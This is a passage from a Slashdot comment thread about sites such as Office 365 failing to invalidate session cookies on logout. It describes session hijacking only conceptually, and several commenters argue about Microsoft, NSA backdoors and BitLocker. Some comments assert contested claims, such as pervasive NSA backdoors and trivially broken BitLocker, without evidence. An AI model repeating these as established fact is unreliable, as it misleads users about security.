      No, that's not what the vulnerability means. To be clear, the exploit is not that "old" cookies can be used to log in as someone else. It's that "in-use" cookies on the client machine can be replicated and used on another machine as long as the session hasn't been timed out on the server. Once I've logged out on the client, nobody can then access that machine and get a client cookie off it to continue the session. They have to have copied the cookie while my session was active on the client. (Please see the article - you can't simply copy old cookies off a machine I once logged into, or even logged out of 3 seconds ago, and access my session - you have to have the active cookie from my live session BEFORE I end the session client-side.).
       
      Thus, there's no fear of using a public PC and then later, someone else using it and accessing my account. The only way this could happen is if the machine is already compromised in some other way which allows the attacker access to my cookie while I'm using it. If the machine is already compromised in such a manner, they can just key-log me instead.
       
      What you're thinking of is an entirely separate issue - very badly coded sites which use permanent cookies as session authentication. THAT is a bad security issue, but not what's being discussed in this article or comments.

      --
      "The true measure of a person is how they act when they know they won't get caught." - DSRilk
    15. Re:What has this got to do with Microsoft? by black3d · · Score: 1

      Actually, I think you understood the issue, but might have worded one sentence badly. Where you said "then the cookies that have been used in that PC could have been copied to somewhere else" I presume you meant "then the cookies that ARE BEING used in that PC could have been copied to somewhere else". The 'attack' has to happen while the session is in-use. Then you can log out and they can still continue using the session with the stolen cookie.
       
      However, as mentioned, the machine already has to be compromised in another way for this to be exploited, making cookie theft a low priority compared to log-in details and credit card numbers.

      --
      "The true measure of a person is how they act when they know they won't get caught." - DSRilk
    16. Re:What has this got to do with Microsoft? by Spykk · · Score: 4, Informative

      There aren't many situations where this vulnerability is relevant, but here is one:

      You are logged into your Office 365 account in a coffee shop with unencrypted wifi. You happen to glance at another patrons computer only to realize that he has hijacked your session by sniffing the unencrypted session cookie that you are sending to the server every time you load a page! You quickly hit the logout button expecting your session to be invalidated, but the logout button only deleted the cookie local to your device. The guy who hijacked your session is still logged in and proceeds to send an email to your boss calling him a "nub".

      Had Microsoft's service invalidated your session token on the server when you hit logout this disaster could have been avoided.

    17. Re:What has this got to do with Microsoft? by black3d · · Score: 1

      Right you are - and I commented in a few other replies that really for this to be exploited there needs to be another security flaw already in play. To me (at least) it seems somewhat pedantic to blame the website (whether it be Microsoft, which seemed to be largely singled out in the summary and accompanying article despite the other huge names mentioned - really, the vast majority of sites in the world have this "issue") when it's almost solely a secondary security issue. It's like leaving your garage door open and then blaming the manufacturer of your key-less car for the fact that their 'security' didn't prevent the thief stealing your car - who already had to exploit another security issue they weren't at fault for in order to get to it. [/tenuous car analogy]
       
      When browsers were a little more vulnerable to XSS attacks than they are now, I'd be more upset about this. But it seems like for *almost* all uses cases, this is the intended behavior on the server-side. It's how they've actually developed it. In order for this to be a flaw, generally, there has to be another pre-existing exploitable security issue. Although, your scenario is one of the best raised so far, as it doesn't require malware, MITM, or any other conventional "compromise" vector to exploit - just an unsecured wireless network.

      --
      "The true measure of a person is how they act when they know they won't get caught." - DSRilk
    18. Re:What has this got to do with Microsoft? by grcumb · · Score: 1

      Is this entire article some kind of joke? If you have physical access to a machine and are able to "steal" the cookies from their logged in browser session, then on another machine replicate that browser session and utilize that same logged in cookie so that the site can't tell the difference between the machine you HAVE PHYSICAL LOGGED-IN ACCESS TO and the replicated session, so you're able to continue using the site? Isn't this behaviour "as intended"? This would only be a "flaw" if another site could remotely copy my cookies and continue my session 'as me'. (Well, actually, I have Java installed, so they probably can *cough*). Otherwise, it's exactly how a logged in cookie is meant to work. The only tacit connection to "Microsoft" seems to be that "Microsoft, like some other companies.. have websites on the internet."

      Well, for services sending clear, unencrypted HTTP traffic, local access isn't necessary. The data interception could be some random Joe or Jane sitting at the same Starbucks as you. Or it could be your friendly neighbourhood ISP, or your telco, or your government.

      So yeah, knowing about it and not working out a fix is a problem. It's evidence that, contrary to advertising claims, Microsoft (and others) are not really taking your privacy as seriously as they should.

      --
      Crumb's Corollary: Never bring a knife to a bun fight.
    19. Re:What has this got to do with Microsoft? by gl4ss · · Score: 1

      outlook is https.

      the real problem is just that logging out doesn't invalidate the cookies server side.

      --
      world was created 5 seconds before this post as it is.
    20. Re:What has this got to do with Microsoft? by Anonymous Coward · · Score: 0

      You are logged into your Office 365 account in a coffee shop with unencrypted wifi. You happen to glance at another patrons computer only to realize that he has hijacked your session by sniffing the unencrypted session cookie that you are sending to the server every time you load a page! You quickly hit the logout button expecting your session to be invalidated, but the logout button only deleted the cookie local to your device. The guy who hijacked your session is still logged in and proceeds to send an email to your boss calling him a "nub".

      Calling him a "nub"? What kind of weirdos hang out in the coffee shops you visit?

    21. Re:What has this got to do with Microsoft? by crazytrain86 · · Score: 1

      This isn't a Microsoft specific problem. The fact that it works on Office 360 is Microsoft's problem, but the fact that other (read "non-microsoft") websites are not handling their cookies in a more secure manner is not a Microsoft problem.

    22. Re:What has this got to do with Microsoft? by Ice+Station+Zebra · · Score: 1

      On wordpress, even if you log out from the site, you can still re-use the cookies and are automatically logged back in.

    23. Re:What has this got to do with Microsoft? by Monoman · · Score: 1

      Trojans will probably keylog and steal cookies if it is worth it. Get rid of the cookie issue and that is one less thing to worry about.

      It is an issue. Just because you have accept this bad security design doesn't make it acceptable to everyone. I too notice which sites do and don't log me out of all tabs I have open in a browser. I like the ones that log me out just like I expect.

      This isn't an "attack" on MS alone. The OP header says "Office 365, Amazon, Others"

      --
      Keep the Classic Slashdot.
  10. Snowden leak: Microsoft added Outlook.com backdoor by Anonymous Coward · · Score: 2, Insightful

    Not an exploit, just business as usual.

    NSA praises Redmond for 'collaborative teamwork'
    There are red faces in Redmond after Edward Snowden released a new batch of documents from the NSA's Special Source Operations (SSO) division covering Microsoft's involvement in allowing backdoor access to its software to the NSA and others.

    Documents seen by The Guardian detail how the NSA became concerned when Microsoft started testing Outlook.com, and asked for access. In five months Microsoft and the FBI created a workaround that gives the NSA access to encrypted chats on Outlook.com. The system went live in December last year – two months before Outlook.com's commercial launch.

    http://www.theregister.co.uk/2013/07/11/snowden_leak_shows_microsoft_added_outlookencryption_backdoor_for_feds/

  11. Tested with Drupal by Ice+Station+Zebra · · Score: 1

    Both http and mixed http/https site with no issues. Once user is logged out, cookies don't work any more.

  12. Cloud problem? by manu0601 · · Score: 1

    If I understand correctly, session cookies have no server-side expiration. If someone manage to steal such a cookie, for instanc uwing a spyware, that person gets access to the account forever.

    Handling session expiration seems an easy thing to do, so why isn't it done here? I wonder if cloud infrastructure is not a problem here: with a highly distributed setup, it may not be trivial to make all nodes aware that a session expired

    1. Re:Cloud problem? by Anonymous Coward · · Score: 0

      Store a server encrypted timestamp in the client's cookie.

  13. any NSA backdoor in FOSS yet? I've studied Firefox by raymorris · · Score: 5, Interesting

    Has anyone studied the Firefox code, you ask. Yep, I have. I happen to be a security professional too. Have all those people who used Firefox as the basis for their browser studied the hell out of it? Yep.

    We know Microsoft is full of NSA backdoors. Has any government backdoor EVER been found in any FOSS, at any time. Nope.

    The insistence on continuing to believe the ridiculous out of fandom is rather curious. Certainly on some level you understand your "beliefs" are laughable, but you're just completely incapable of changing your thoughts, of learning.

  14. tis called Javascript in IE, or Flash by raymorris · · Score: 1

    I haven't checked IE9, but in IE 6, 7, and 8 a bit of JavaScript could steal your cookies. I'm sure it can be done in 9 as well, I just haven't had the need to see how.

    Other browsers have a slightly better history.

  15. Re:Snowden leak: Microsoft added Outlook.com backd by amiga3D · · Score: 1

    Old news. They've been collaborating since way back over a decade ago at least. This from Win98.

    http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/

  16. Bash Mirosoft day by OneAhead · · Score: 1

    I dislike Microsoft as much as the next person, but how on earth is it Microsoft's fault that all these non-Microsoft sites do not invalidate the security token inside the session cookie when receiving a "Log out" command? All I can infer is that a number of Microsoft services (hotmail, outlook.com, office 365) were vulnerable in 2012, Microsoft was notified of it, and (if I interpret TFA correctly) didn't fix it. Is it now Microsoft's job to start probing other people's websites (Twitter, LinkedIn, Amazon, eBay, WordPress, NetFlix) for the same type of vulnerabilty and somehow force them to fix the vulnerability it didn't find worth fixing itself?

  17. Re:any NSA backdoor in FOSS yet? I've studied Fire by DigiShaman · · Score: 1

    Microsoft Bitlocker and Apple FileVault are the two most popular forms of disk encryption used. I'm pretty sure the NSA can access any Bitlocker drive. Without question they can access FileVault if you uploaded your key to Apple for safe keeping.

    --
    Life is not for the lazy.
  18. yeah, I've been R&Ding for years by raymorris · · Score: 2

    > and make authentication someone else's problem with single-signon." Does anyone really know or have they merely amassed years of experience doing what they think is right?

    I should know. I spent 17 years keeping ahead of the bad guys and ahead of the competition, developing a security system used by tens of thousands of sites. The thing is, there are a lot of ways to screw up authentication, and a lot of ways to screw up authorization. Professionals making security products screwed it up all the time, and we made two significant errors. We're arguably the best in the business, and still we made mistakes.

    Therefore, "make it someone else's problem" isn't a bad answer, if someone else knows what they are doing. I'm not very careful with many things, but I'm darn careful with two - online authentication and explosives. I can answer any specific questions, but to try to cover the topic in a Slashdot post would be a lot like a post on how to make fireworks. There's not time or space to cover the topic properly. Feel free to post or email specific questions, though.

    1. Re:yeah, I've been R&Ding for years by Anonymous Coward · · Score: 0

      I think OWASP did a good job creating a reference implementation of session and authentication management in Java (solving the "make it someone else's problem" problem), but unless we sit around waiting for them to come up with a reference implementation in Rails, a reference implementation in Django, a reference implementation in PHP and so on, what we need is for someone who knows java to go in, read it, and create a reference the rest of us can use.

  19. Bitlocker cracked since at least 2008 by raymorris · · Score: 5, Informative

    There are three modes of operation possible with Bitlocker. The most secure has had an exploit publicly known for five years. In that most secure mode, reading the disk is inconvenient, but entirely possible even for independent security people like myself. For a nation-state, it's trivial.

    1. Re: Bitlocker cracked since at least 2008 by semi-extrinsic · · Score: 1

      I keep explaining this to people at work, but they invariably do a mental "lalala, my data is secure, lalala" every time.

      --
      for i in `facebook friends "=bday" 2>/dev/null | cut -d " " -f 3-`; do facebook wallpost $i "Happy birthday!"; done
    2. Re: Bitlocker cracked since at least 2008 by master_kaos · · Score: 1

      Yeah, and you know whats even more funny? That you are wearing a tinfoil hat. Even if for whatever reason NSA was obtaining your data (highly unlikely), do you think they would give 1 shit about it?

    3. Re: Bitlocker cracked since at least 2008 by Archangel+Michael · · Score: 1

      Security through irrelevance? Sounds like a great idea!

      --
      Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
    4. Re: Bitlocker cracked since at least 2008 by semi-extrinsic · · Score: 1

      I happen to work in petroleum research, where industrial espionage is far from unheard of. Some people have more sensitive information on their (work) computers than kitten photos, you know.

      --
      for i in `facebook friends "=bday" 2>/dev/null | cut -d " " -f 3-`; do facebook wallpost $i "Happy birthday!"; done
  20. Only unacceptable because its the cloud by Karmashock · · Score: 1

    The reality is that most of this stuff was and is fine so long as it remains on private systems. A hundred million computers scattered all over the planet are a lot harder to target then a few centralized datacenters.

    MS office has had issues with security for ages. But all of it was controllable because you could just "not" download viruses. Or "not" horribly infect yourself with malware. But when its all on the cloud that isn't an option anymore. The hackers have ONE target and when they penetrate it... they f' over EVERYONE using the system. That's a big difference.

    I get what MS wants to do here... they want to get people to stop pirating their software by using a cloud based software system.

    The problem is that their model is less useful and actually puts a burden of responsibility upon them to secure our data that they're not willing or able satisfy. As a result, I think you'll find a lot of these companies retreating from this idea as it becomes clear that customers won't put up with it.

    Your choice MS... how little market share do you want? Because it can go lower.

    --
    I've decided to stop wasting my time responding to AC trolls/sockpuppets... so if you want a response from me... login.
  21. Not a Microsoft Problem by crazytrain86 · · Score: 1

    This type of cookie behavior is not at the OS or even web server level. Microsoft has nothing to do with this. This type of interaction will be at the application level and up to the individual websites to handle. Its been widely known that many sites have not bothered to secure their cookies in this way. But this isn't something you can blame on Microsoft.

  22. Haven't fixed Outlook issue since its inception by smooth+wombat · · Score: 1

    This shouldn't surprise anyone. Microsoft has never bothered to fix the flaw in Outlook where opening attachments directly from an email rather than saving them first will eventually fill a temp directory and prevent you from opening any more attachments. This has been in existence since Outlook came out.

    Once the number of temp files reaches about 100 you're screwed until you root through the system and find the directory and clear it.

    The issue, its symptoms and recommendations:

    http://www.howto-outlook.com/faq/securetemp.htm

    --
    We will bankrupt ourselves in the vain search for absolute security. -- Dwight D. Eisenhower
  23. Ok "security guru" by Anonymous Coward · · Score: 0

    Who designed SeLinux? The NSA: Do YOU trust it now?? What makes ME laugh, is guys like you - you really do: How "security pro" are you without tools coders MAKE for you to USE, "user with a better password"??? You're not.

  24. Re:any NSA backdoor in FOSS yet? I've studied Fire by Anonymous Coward · · Score: 0

    So, OP asked for a show of hands in a FOSS-rich arena and got one person. That seems to have made his point for him.

  25. Re:any NSA backdoor in FOSS yet? I've studied Fire by Anonymous Coward · · Score: 0

    The insistence on continuing to believe the ridiculous out of fandom is rather curious.

    It's not fandom, it's self-interest. hairyfeet earns his money by fixing Windows computers. If Windows wasn't such a user-hostile, poorly written, feature-poor OS hairyfeet would earn a lot less money. He knows which side of his bread is buttered. If Winfows computers didn't constantly get infected a lot of glaziers would be out of work (yes, I'm referring to the brokwn window fallacy).

    He knows Windows is a piece of shit, but it's against his self-interest to admit it.

  26. Re:any NSA backdoor in FOSS yet? I've studied Fire by Anonymous Coward · · Score: 0

    Don't forget to mention NSA's role in AES, which is the De facto encryption for the entire world.